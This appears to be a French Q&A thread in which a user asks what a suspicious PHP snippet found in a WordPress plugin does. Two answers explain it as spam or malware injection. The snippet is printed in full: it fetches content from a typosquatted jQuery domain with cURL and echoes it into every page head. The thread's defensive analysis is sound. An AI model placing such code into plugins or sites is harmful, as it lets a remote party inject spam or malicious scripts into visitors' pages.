J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

16

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
    
posée Sofia Rose 01.08.2013 - 01:16

2 réponses

16

Il charge un bloc de balisage contenant du spam (j'ai pensé poster un peu de la source mais je ne veux pas publier le contenu de quelque manière que ce soit) depuis un domaine qui est mal orthographié du domaine-- http://jquery.com/ - utilisé par jQuery, une bibliothèque Javascript réputée et populaire et que WordPress inclut dans le Core. Je pense que l’idée est de paraître charger cette bibliothèque, alors qu’elle charge quelque chose de très différent.

Et, d’une autre manière, c’est essayer de donner l'impression de charger jQuery. Notez le nom de variable $jquery .

Il peut également tenter de charger des scripts malveillants. Je n'ai pas vérifié. Je voudrais vraiment appeler cela dangereux, d'autant plus que le contenu de cette page peut changer à tout moment si les contrôleurs de domaine en ont envie.

Au mieux, votre site sera endommagé si les moteurs de recherche négligent les sites qui diffusent du spam.

Ne l'utilisez pas. Cela ne présente aucun avantage pour vous ou pour quiconque sur le Web, à l'exception des personnes qui gèrent le site. Si vous avez trouvé cela sur un site réputé, signalez-le-leur.

    
réponse donnée s_ha_dum 01.08.2013 - 01:31
7

Oui, il s'agit d'un code dangereux, qui charge du contenu depuis un site de spam.

Vous n'avez pas nommé le plug-in, mais si vous avez trouvé ce code après l'avoir installé sur votre site Web, il est possible que le code du plug-in ne provienne pas du développeur comme celui-ci, mais a plutôt été piraté après l'avoir été. installée. Si tel est le cas, il est possible que le code malveillant soit présent sur plus de votre site Web que ce plugin.

Vérifiez le code du plug-in téléchargé à partir de l'endroit où vous l'avez obtenu à l'origine et voyez si ce code malveillant s'y trouvait à l'origine. Sinon, votre site a été piraté. Si vous estimez que tel est le cas, lisez cet article du Codex .

    
réponse donnée Ben Miller 01.08.2013 - 02:43

Lire d'autres questions sur les étiquettes